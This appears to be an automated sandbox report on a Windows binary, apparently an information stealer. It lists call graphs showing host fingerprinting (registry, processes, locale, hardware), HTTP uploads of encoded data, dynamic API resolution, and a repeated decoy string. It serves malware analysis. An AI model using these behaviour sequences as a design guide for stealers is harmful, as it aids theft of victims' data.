f19470 OpenProcess 15168->15781 15171 f1a920 3 API calls 15172 f120a4 15171->15172 15173 f1a8a0 lstrcpy 15172->15173 15174 f120ad 15173->15174 15175 f1a9b0 4 API calls 15174->15175 15176 f120d7 15175->15176 15177 f1a8a0 lstrcpy 15176->15177 15178 f120e0 15177->15178 15179 f1a9b0 4 API calls 15178->15179 15180 f12100 15179->15180 15181 f1a8a0 lstrcpy 15180->15181 15182 f12109 15181->15182 15786 f17e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15182->15786 15185 f1a9b0 4 API calls 15186 f12129 15185->15186 15187 f1a8a0 lstrcpy 15186->15187 15188 f12132 15187->15188 15189 f1a9b0 4 API calls 15188->15189 15190 f12151 15189->15190 15191 f1a8a0 lstrcpy 15190->15191 15192 f1215a 15191->15192 15193 f1a9b0 4 API calls 15192->15193 15194 f1217b 15193->15194 15195 f1a8a0 lstrcpy 15194->15195 15196 f12184 15195->15196 15790 f17f60 15196->15790 15199 f1a9b0 4 API calls 15200 f121a4 15199->15200 15201 f1a8a0 lstrcpy 15200->15201 15202 f121ad 15201->15202 15203 f1a9b0 4 API calls 15202->15203 15204 f121cc 15203->15204 15205 f1a8a0 lstrcpy 15204->15205 15206 f121d5 15205->15206 15207 f1a9b0 4 API calls 15206->15207 15208 f121f6 15207->15208 15209 f1a8a0 lstrcpy 15208->15209 15210 f121ff 15209->15210 15803 f17ed0 GetSystemInfo wsprintfA 15210->15803 15213 f1a9b0 4 API calls 15214 f1221f 15213->15214 15215 f1a8a0 lstrcpy 15214->15215 15216 f12228 15215->15216 15217 f1a9b0 4 API calls 15216->15217 15218 f12247 15217->15218 15219 f1a8a0 lstrcpy 15218->15219 15220 f12250 15219->15220 15221 f1a9b0 4 API calls 15220->15221 15222 f12270 15221->15222 15223 f1a8a0 lstrcpy 15222->15223 15224 f12279 15223->15224 15805 f18100 GetProcessHeap RtlAllocateHeap 15224->15805 15227 f1a9b0 4 API calls 15228 f12299 15227->15228 15229 f1a8a0 lstrcpy 15228->15229 15230 f122a2 15229->15230 15231 f1a9b0 4 API calls 15230->15231 15232 f122c1 15231->15232 15233 f1a8a0 lstrcpy 15232->15233 15234 f122ca 15233->15234 15235 f1a9b0 4 API calls 15234->15235 15236 f122eb 15235->15236 15237 f1a8a0 lstrcpy 15236->15237 15238 f122f4 15237->15238 15811 f187c0 15238->15811 15241 f1a920 3 API calls 15242 f1231e 15241->15242 15243 f1a8a0 lstrcpy 15242->15243 15244 f12327 15243->15244 15245 f1a9b0 4 API calls 15244->15245 15246 f12351 15245->15246 15247 f1a8a0 lstrcpy 15246->15247 15248 f1235a 15247->15248 15249 f1a9b0 4 API calls 15248->15249 15250 f1237a 15249->15250 15251 f1a8a0 lstrcpy 15250->15251 15252 f12383 15251->15252 15253 f1a9b0 4 API calls 15252->15253 15254 f123a2 15253->15254 15255 f1a8a0 lstrcpy 15254->15255 15256 f123ab 15255->15256 15816 f181f0 15256->15816 15258 f123c2 15259 f1a920 3 API calls 15258->15259 15260 f123d5 15259->15260 15261 f1a8a0 lstrcpy 15260->15261 15262 f123de 15261->15262 15263 f1a9b0 4 API calls 15262->15263 15264 f1240a 15263->15264 15265 f1a8a0 lstrcpy 15264->15265 15266 f12413 15265->15266 15267 f1a9b0 4 API calls 15266->15267 15268 f12432 15267->15268 15269 f1a8a0 lstrcpy 15268->15269 15270 f1243b 15269->15270 15271 f1a9b0 4 API calls 15270->15271 15272 f1245c 15271->15272 15273 f1a8a0 lstrcpy 15272->15273 15274 f12465 15273->15274 15275 f1a9b0 4 API calls 15274->15275 15276 f12484 15275->15276 15277 f1a8a0 lstrcpy 15276->15277 15278 f1248d 15277->15278 15279 f1a9b0 4 API calls 15278->15279 15280 f124ae 15279->15280 15281 f1a8a0 lstrcpy 15280->15281 15282 f124b7 15281->15282 15824 f18320 15282->15824 15284 f124d3 15285 f1a920 3 API calls 15284->15285 15286 f124e6 15285->15286 15287 f1a8a0 lstrcpy 15286->15287 15288 f124ef 15287->15288 15289 f1a9b0 4 API calls 15288->15289 15290 f12519 15289->15290 15291 f1a8a0 lstrcpy 15290->15291 15292 f12522 15291->15292 15293 f1a9b0 4 API calls 15292->15293 15294 f12543 15293->15294 15295 f1a8a0 lstrcpy 15294->15295 15296 f1254c 15295->15296 15297 f18320 17 API calls 15296->15297 15298 f12568 15297->15298 15299 f1a920 3 API calls 15298->15299 15300 f1257b 15299->15300 15301 f1a8a0 lstrcpy 15300->15301 15302 f12584 15301->15302 15303 f1a9b0 4 API calls 15302->15303 15304 f125ae 15303->15304 15305 f1a8a0 lstrcpy 15304->15305 15306 f125b7 15305->15306 15307 f1a9b0 4 API calls 15306->15307 15308 f125d6 15307->15308 15309 f1a8a0 lstrcpy 15308->15309 15310 f125df 15309->15310 15311 f1a9b0 4 API calls 15310->15311 15312 f12600 15311->15312 15313 f1a8a0 lstrcpy 15312->15313 15314 f12609 15313->15314 15860 f18680 15314->15860 15316 f12620 15317 f1a920 3 API calls 15316->15317 15318 f12633 15317->15318 15319 f1a8a0 lstrcpy 15318->15319 15320 f1263c 15319->15320 15321 f1265a lstrlen 15320->15321 15322 f1266a 15321->15322 15323 f1a740 lstrcpy 15322->15323 15324 f1267c 15323->15324 15325 f01590 lstrcpy 15324->15325 15326 f1268d 15325->15326 15870 f15190 15326->15870 15328 f12699 15328->13760 16058 f1aad0 15329->16058 15331 f05009 InternetOpenUrlA 15335 f05021 15331->15335 15332 f050a0 InternetCloseHandle InternetCloseHandle 15334 f050ec 15332->15334 15333 f0502a InternetReadFile 15333->15335 15334->13764 15335->15332 15335->15333 16059 f098d0 15336->16059 15338 f10759 15339 f10a38 15338->15339 15340 f1077d 15338->15340 15341 f01590 lstrcpy 15339->15341 15342 f10799 StrCmpCA 15340->15342 15343 f10a49 15341->15343 15344 f107a8 15342->15344 15373 f10843 15342->15373 16235 f10250 15343->16235 15346 f1a7a0 lstrcpy 15344->15346 15347 f107c3 15346->15347 15351 f01590 lstrcpy 15347->15351 15348 f10865 StrCmpCA 15349 f10874 15348->15349 15354 f1096b 15348->15354 15352 f1a740 lstrcpy 15349->15352 15353 f1080c 15351->15353 15356 f10881 15352->15356 15357 f1a7a0 lstrcpy 15353->15357 15355 f1099c StrCmpCA 15354->15355 15358 f10a2d 15355->15358 15359 f109ab 15355->15359 15360 f1a9b0 4 API calls 15356->15360 15361 f10823 15357->15361 15358->13768 15362 f01590 lstrcpy 15359->15362 15363 f108ac 15360->15363 15364 f1a7a0 lstrcpy 15361->15364 15365 f109f4 15362->15365 15366 f1a920 3 API calls 15363->15366 15367 f1083e 15364->15367 15368 f1a7a0 lstrcpy 15365->15368 15369 f108b3 15366->15369 16062 f0fb00 15367->16062 15371 f10a0d 15368->15371 15372 f1a9b0 4 API calls 15369->15372 15374 f1a7a0 lstrcpy 15371->15374 15375 f108ba 15372->15375 15373->15348 15376 f10a28 15374->15376 16178 f10030 15376->16178 15710 f1a7a0 lstrcpy 15709->15710 15711 f01683 15710->15711 15712 f1a7a0 lstrcpy 15711->15712 15713 f01695 15712->15713 15714 f1a7a0 lstrcpy 15713->15714 15715 f016a7 15714->15715 15716 f1a7a0 lstrcpy 15715->15716 15717 f015a3 15716->15717 15717->14591 15719 f047c6 15718->15719 15720 f04838 lstrlen 15719->15720 15744 f1aad0 15720->15744 15722 f04848 InternetCrackUrlA 15723 f04867 15722->15723 15723->14668 15725 f1a740 lstrcpy 15724->15725 15726 f18b74 15725->15726 15727 f1a740 lstrcpy 15726->15727 15728 f18b82 GetSystemTime 15727->15728 15729 f18b99 15728->15729 15730 f1a7a0 lstrcpy 15729->15730 15731 f18bfc 15730->15731 15731->14683 15733 f1a931 15732->15733 15734 f1a988 15733->15734 15736 f1a968 lstrcpy lstrcat 15733->15736 15735 f1a7a0 lstrcpy 15734->15735 15737 f1a994 15735->15737 15736->15734 15737->14686 15738->14801 15740 f09af9 LocalAlloc 15739->15740 15741 f04eee 15739->15741 15740->15741 15742 f09b14 CryptStringToBinaryA 15740->15742 15741->14689 15741->14692 15742->15741 15743 f09b39 LocalFree 15742->15743 15743->15741 15744->15722 15745->14811 15746->14952 15747->14954 15748->14962 15877 f177a0 15749->15877 15752 f176c6 RegOpenKeyExA 15754 f17704 RegCloseKey 15752->15754 15755 f176e7 RegQueryValueExA 15752->15755 15753 f11c1e 15753->15044 15754->15753 15755->15754 15757 f11c99 15756->15757 15757->15058 15759 f11e09 15758->15759 15759->15100 15761 f11e84 15760->15761 15762 f17a9a wsprintfA 15760->15762 15761->15114 15762->15761 15764 f17b4d 15763->15764 15765 f11efe 15763->15765 15884 f18d20 LocalAlloc CharToOemW 15764->15884 15765->15128 15768 f1a740 lstrcpy 15767->15768 15769 f17bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15768->15769 15778 f17c25 15769->15778 15770 f17c46 GetLocaleInfoA 15770->15778 15771 f17d18 15772 f17d28 15771->15772 15773 f17d1e LocalFree 15771->15773 15774 f1a7a0 lstrcpy 15772->15774 15773->15772 15777 f17d37 15774->15777 15775 f1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15775->15778 15776 f1a8a0 lstrcpy 15776->15778 15777->15141 15778->15770 15778->15771 15778->15775 15778->15776 15780 f12008 15779->15780 15780->15156 15782 f19493 GetModuleFileNameExA CloseHandle 15781->15782 15783 f194b5 15781->15783 15782->15783 15784 f1a740 lstrcpy 15783->15784 15785 f12091 15784->15785 15785->15171 15787 f12119 15786->15787 15788 f17e68 RegQueryValueExA 15786->15788 15787->15185 15789 f17e8e RegCloseKey 15788->15789 15789->15787 15791 f17fb9 GetLogicalProcessorInformationEx 15790->15791 15792 f17fd8 GetLastError 15791->15792 15796 f18029 15791->15796 15801 f18022 15792->15801 15802 f17fe3 15792->15802 15795 f12194 15795->15199 15797 f189f0 2 API calls 15796->15797 15799 f1807b 15797->15799 15798 f189f0 2 API calls 15798->15795 15800 f18084 wsprintfA 15799->15800 15799->15801 15800->15795 15801->15795 15801->15798 15802->15791 15802->15795 15885 f189f0 15802->15885 15888 f18a10 GetProcessHeap RtlAllocateHeap 15802->15888 15804 f1220f 15803->15804 15804->15213 15806 f189b0 15805->15806 15807 f1814d GlobalMemoryStatusEx 15806->15807 15810 f18163 15807->15810 15808 f1819b wsprintfA 15809 f12289 15808->15809 15809->15227 15810->15808 15812 f187fb GetProcessHeap RtlAllocateHeap wsprintfA 15811->15812 15814 f1a740 lstrcpy 15812->15814 15815 f1230b 15814->15815 15815->15241 15817 f1a740 lstrcpy 15816->15817 15823 f18229 15817->15823 15818 f18263 15820 f1a7a0 lstrcpy 15818->15820 15819 f1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15819->15823 15821 f182dc 15820->15821 15821->15258 15822 f1a8a0 lstrcpy 15822->15823 15823->15818 15823->15819 15823->15822 15825 f1a740 lstrcpy 15824->15825 15826 f1835c RegOpenKeyExA 15825->15826 15827 f183d0 15826->15827 15828 f183ae 15826->15828 15830 f18613 RegCloseKey 15827->15830 15831 f183f8 RegEnumKeyExA 15827->15831 15829 f1a7a0 lstrcpy 15828->15829 15841 f183bd 15829->15841 15834 f1a7a0 lstrcpy 15830->15834 15832 f1843f wsprintfA RegOpenKeyExA 15831->15832 15833 f1860e 15831->15833 15835 f184c1 RegQueryValueExA 15832->15835 15836 f18485 RegCloseKey RegCloseKey 15832->15836 15833->15830 15834->15841 15838 f18601 RegCloseKey 15835->15838 15839 f184fa lstrlen 15835->15839 15837 f1a7a0 lstrcpy 15836->15837 15837->15841 15838->15833 15839->15838 15840 f18510 15839->15840 15842 f1a9b0 4 API calls 15840->15842 15841->15284 15843 f18527 15842->15843 15844 f1a8a0 lstrcpy 15843->15844 15845 f18533 15844->15845 15846 f1a9b0 4 API calls 15845->15846 15847 f18557 15846->15847 15848 f1a8a0 lstrcpy 15847->15848 15849 f18563 15848->15849 15850 f1856e RegQueryValueExA 15849->15850 15850->15838 15851 f185a3 15850->15851 15852 f1a9b0 4 API calls 15851->15852 15853 f185ba 15852->15853 15854 f1a8a0 lstrcpy 15853->15854 15855 f185c6 15854->15855 15856 f1a9b0 4 API calls 15855->15856 15857 f185ea 15856->15857 15858 f1a8a0 lstrcpy 15857->15858 15859 f185f6 15858->15859 15859->15838 15861 f1a740 lstrcpy 15860->15861 15862 f186bc CreateToolhelp32Snapshot Process32First 15861->15862 15863 f186e8 Process32Next 15862->15863 15864 f1875d CloseHandle 15862->15864 15863->15864 15869 f186fd 15863->15869 15865 f1a7a0 lstrcpy 15864->15865 15867 f18776 15865->15867 15866 f1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15866->15869 15867->15316 15868 f1a8a0 lstrcpy 15868->15869 15869->15863 15869->15866 15869->15868 15871 f1a7a0 lstrcpy 15870->15871 15872 f151b5 15871->15872 15873 f01590 lstrcpy 15872->15873 15874 f151c6 15873->15874 15889 f05100 15874->15889 15876 f151cf 15876->15328 15880 f17720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15877->15880 15879 f176b9 15879->15752 15879->15753 15881 f17780 RegCloseKey 15880->15881 15882 f17765 RegQueryValueExA 15880->15882 15883 f17793 15881->15883 15882->15881 15883->15879 15884->15765 15886 f189f9 GetProcessHeap HeapFree 15885->15886 15887 f18a0c 15885->15887 15886->15887 15887->15802 15888->15802 15890 f1a7a0 lstrcpy 15889->15890 15891 f05119 15890->15891 15892 f047b0 2 API calls 15891->15892 15893 f05125 15892->15893 16049 f18ea0 15893->16049 15895 f05184 15896 f05192 lstrlen 15895->15896 15897 f051a5 15896->15897 15898 f18ea0 4 API calls 15897->15898 15899 f051b6 15898->15899 15900 f1a740 lstrcpy 15899->15900 15901 f051c9 15900->15901 15902 f1a740 lstrcpy 15901->15902 15903 f051d6 15902->15903 15904 f1a740 lstrcpy 15903->15904 15905 f051e3 15904->15905 15906 f1a740 lstrcpy 15905->15906 15907 f051f0 15906->15907 15908 f1a740 lstrcpy 15907->15908 15909 f051fd InternetOpenA StrCmpCA 15908->15909 15910 f0522f 15909->15910 15911 f058c4 InternetCloseHandle 15910->15911 15912 f18b60 3 API calls 15910->15912 15918 f058d9 ctype 15911->15918 15913 f0524e 15912->15913 15914 f1a920 3 API calls 15913->15914 15915 f05261 15914->15915 15916 f1a8a0 lstrcpy 15915->15916 15917 f0526a 15916->15917 15919 f1a9b0 4 API calls 15917->15919 15921 f1a7a0 lstrcpy 15918->15921 15920 f052ab 15919->15920 15922 f1a920 3 API calls 15920->15922 15930 f05913 15921->15930 15923 f052b2 15922->15923 15924 f1a9b0 4 API calls 15923->15924 15925 f052b9 15924->15925 15926 f1a8a0 lstrcpy 15925->15926 15927 f052c2 15926->15927 15928 f1a9b0 4 API calls 15927->15928 15929 f05303 15928->15929 15931 f1a920 3 API calls 15929->15931 15930->15876 15932 f0530a 15931->15932 15933 f1a8a0 lstrcpy 15932->15933 15934 f05313 15933->15934 15935 f05329 InternetConnectA 15934->15935 15935->15911 15936 f05359 HttpOpenRequestA 15935->15936 15938 f058b7 InternetCloseHandle 15936->15938 15939 f053b7 15936->15939 15938->15911 15940 f1a9b0 4 API calls 15939->15940 15941 f053cb 15940->15941 15942 f1a8a0 lstrcpy 15941->15942 15943 f053d4 15942->15943 15944 f1a920 3 API calls 15943->15944 15945 f053f2 15944->15945 15946 f1a8a0 lstrcpy 15945->15946 15947 f053fb 15946->15947 15948 f1a9b0 4 API calls 15947->15948 15949 f0541a 15948->15949 15950 f1a8a0 lstrcpy 15949->15950 15951 f05423 15950->15951 15952 f1a9b0 4 API calls 15951->15952 15953 f05444 15952->15953 15954 f1a8a0 lstrcpy 15953->15954 15955 f0544d 15954->15955 15956 f1a9b0 4 API calls 15955->15956 15957 f0546e 15956->15957 15958 f1a8a0 lstrcpy 15957->15958 16050 f18ea9 16049->16050 16051 f18ead CryptBinaryToStringA 16049->16051 16050->15895 16051->16050 16052 f18ece GetProcessHeap RtlAllocateHeap 16051->16052 16052->16050 16053 f18ef4 ctype 16052->16053 16054 f18f05 CryptBinaryToStringA 16053->16054 16054->16050 16058->15331 16301 f09880 16059->16301 16061 f098e1 16061->15338 16063 f1a740 lstrcpy 16062->16063 16236 f1a740 lstrcpy 16235->16236 16237 f10266 16236->16237 16238 f18de0 2 API calls 16237->16238 16239 f1027b 16238->16239 16240 f1a920 3 API calls 16239->16240 16241 f1028b 16240->16241 16242 f1a8a0 lstrcpy 16241->16242 16243 f10294 16242->16243 16244 f1a9b0 4 API calls 16243->16244 16245 f102b8 16244->16245 16302 f0988e 16301->16302 16305 f06fb0 16302->16305 16304 f098ad ctype 16304->16061 16308 f06d40 16305->16308 16309 f06d63 16308->16309 16323 f06d59 16308->16323 16324 f06530 16309->16324 16313 f06dbe 16313->16323 16334 f069b0 16313->16334 16315 f06e2a 16316 f06ee6 VirtualFree 16315->16316 16318 f06ef7 16315->16318 16315->16323 16316->16318 16317 f06f41 16321 f189f0 2 API calls 16317->16321 16317->16323 16318->16317 16319 f06f26 FreeLibrary 16318->16319 16320 f06f38 16318->16320 16319->16318 16322 f189f0 2 API calls 16320->16322 16321->16323 16322->16317 16323->16304 16325 f06542 16324->16325 16327 f06549 16325->16327 16344 f18a10 GetProcessHeap RtlAllocateHeap 16325->16344 16327->16323 16328 f06660 16327->16328 16331 f0668f VirtualAlloc 16328->16331 16330 f06730 16332 f06743 VirtualAlloc 16330->16332 16333 f0673c 16330->16333 16331->16330 16331->16333 16332->16333 16333->16313 16335 f069c9 16334->16335 16339 f069d5 16334->16339 16336 f06a09 LoadLibraryA 16335->16336 16335->16339 16337 f06a32 16336->16337 16336->16339 16341 f06ae0 16337->16341 16345 f18a10 GetProcessHeap RtlAllocateHeap 16337->16345 16339->16315 16340 f06ba8 GetProcAddress 16340->16339 16340->16341 16341->16339 16341->16340 16342 f189f0 2 API calls 16342->16341 16343 f06a8b 16343->16339 16343->16342 16344->16327 16345->16343

                        Executed Functions

                        Function 00F19860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 f19860-f19874 call f19750 663 f19a93-f19af2 LoadLibraryA * 5 660->663 664 f1987a-f19a8e call f19780 GetProcAddress * 21 660->664 666 f19af4-f19b08 GetProcAddress 663->666 667 f19b0d-f19b14 663->667 664->663 666->667 669 f19b46-f19b4d 667->669 670 f19b16-f19b41 GetProcAddress * 2 667->670 671 f19b68-f19b6f 669->671 672 f19b4f-f19b63 GetProcAddress 669->672 670->669 673 f19b71-f19b84 GetProcAddress 671->673 674 f19b89-f19b90 671->674 672->671 673->674 675 f19bc1-f19bc2 674->675 676 f19b92-f19bbc GetProcAddress * 2 674->676 676->675
                        APIs
                        • GetProcAddress.KERNEL32(75900000,008A14E0), ref: 00F198A1
                        • GetProcAddress.KERNEL32(75900000,008A16D8), ref: 00F198BA
                        • GetProcAddress.KERNEL32(75900000,008A16F0), ref: 00F198D2
                        • GetProcAddress.KERNEL32(75900000,008A1708), ref: 00F198EA
                        • GetProcAddress.KERNEL32(75900000,008A1558), ref: 00F19903
                        • GetProcAddress.KERNEL32(75900000,008A97F0), ref: 00F1991B
                        • GetProcAddress.KERNEL32(75900000,00896900), ref: 00F19933
                        • GetProcAddress.KERNEL32(75900000,00896740), ref: 00F1994C
                        • GetProcAddress.KERNEL32(75900000,008A1720), ref: 00F19964
                        • GetProcAddress.KERNEL32(75900000,008A1738), ref: 00F1997C
                        • GetProcAddress.KERNEL32(75900000,008A1780), ref: 00F19995
                        • GetProcAddress.KERNEL32(75900000,008A1798), ref: 00F199AD
                        • GetProcAddress.KERNEL32(75900000,00896700), ref: 00F199C5
                        • GetProcAddress.KERNEL32(75900000,008A17B0), ref: 00F199DE
                        • GetProcAddress.KERNEL32(75900000,008A14F8), ref: 00F199F6
                        • GetProcAddress.KERNEL32(75900000,008968E0), ref: 00F19A0E
                        • GetProcAddress.KERNEL32(75900000,008A1510), ref: 00F19A27
                        • GetProcAddress.KERNEL32(75900000,008A1810), ref: 00F19A3F
                        • GetProcAddress.KERNEL32(75900000,00896800), ref: 00F19A57
                        • GetProcAddress.KERNEL32(75900000,008A17E0), ref: 00F19A70
                        • GetProcAddress.KERNEL32(75900000,00896680), ref: 00F19A88
                        • LoadLibraryA.KERNEL32(008A17F8,?,00F16A00), ref: 00F19A9A
                        • LoadLibraryA.KERNEL32(008A1870,?,00F16A00), ref: 00F19AAB
                        • LoadLibraryA.KERNEL32(008A1888,?,00F16A00), ref: 00F19ABD
                        • LoadLibraryA.KERNEL32(008A1828,?,00F16A00), ref: 00F19ACF
                        • LoadLibraryA.KERNEL32(008A17C8,?,00F16A00), ref: 00F19AE0
                        • GetProcAddress.KERNEL32(75070000,008A1840), ref: 00F19B02
                        • GetProcAddress.KERNEL32(75FD0000,008A1858), ref: 00F19B23
                        • GetProcAddress.KERNEL32(75FD0000,008A9C88), ref: 00F19B3B
                        • GetProcAddress.KERNEL32(75A50000,008A9BB0), ref: 00F19B5D
                        • GetProcAddress.KERNEL32(74E50000,00896720), ref: 00F19B7E
                        • GetProcAddress.KERNEL32(76E80000,008A9760), ref: 00F19B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00F19BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00F19BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 0be27ce867520cc0f0d4b2dcecfe1b09697e1ad979aa368c857f2c1fd57aa884
                        • Instruction ID: 63ebec3b86aca1bfe27352d2f51794783ebab8ee24530a6d3a5db8b2c824316c
                        • Opcode Fuzzy Hash: 0be27ce867520cc0f0d4b2dcecfe1b09697e1ad979aa368c857f2c1fd57aa884
                        • Instruction Fuzzy Hash: 47A16DBD5C46019FE37CDFA8F5989563BF9FF88A12306453AA6278320CD63A94C1DB50
                        Function 00F045C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 f045c0-f04695 RtlAllocateHeap 781 f046a0-f046a6 764->781 782 f046ac-f0474a 781->782 783 f0474f-f047a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F0460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00F0479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F046CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F046C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F045F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F045E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F0474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F0471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F046AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F0473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F0477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F0475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F046B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F045D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F045DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F0462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F046D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F0466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F045C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F04617
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
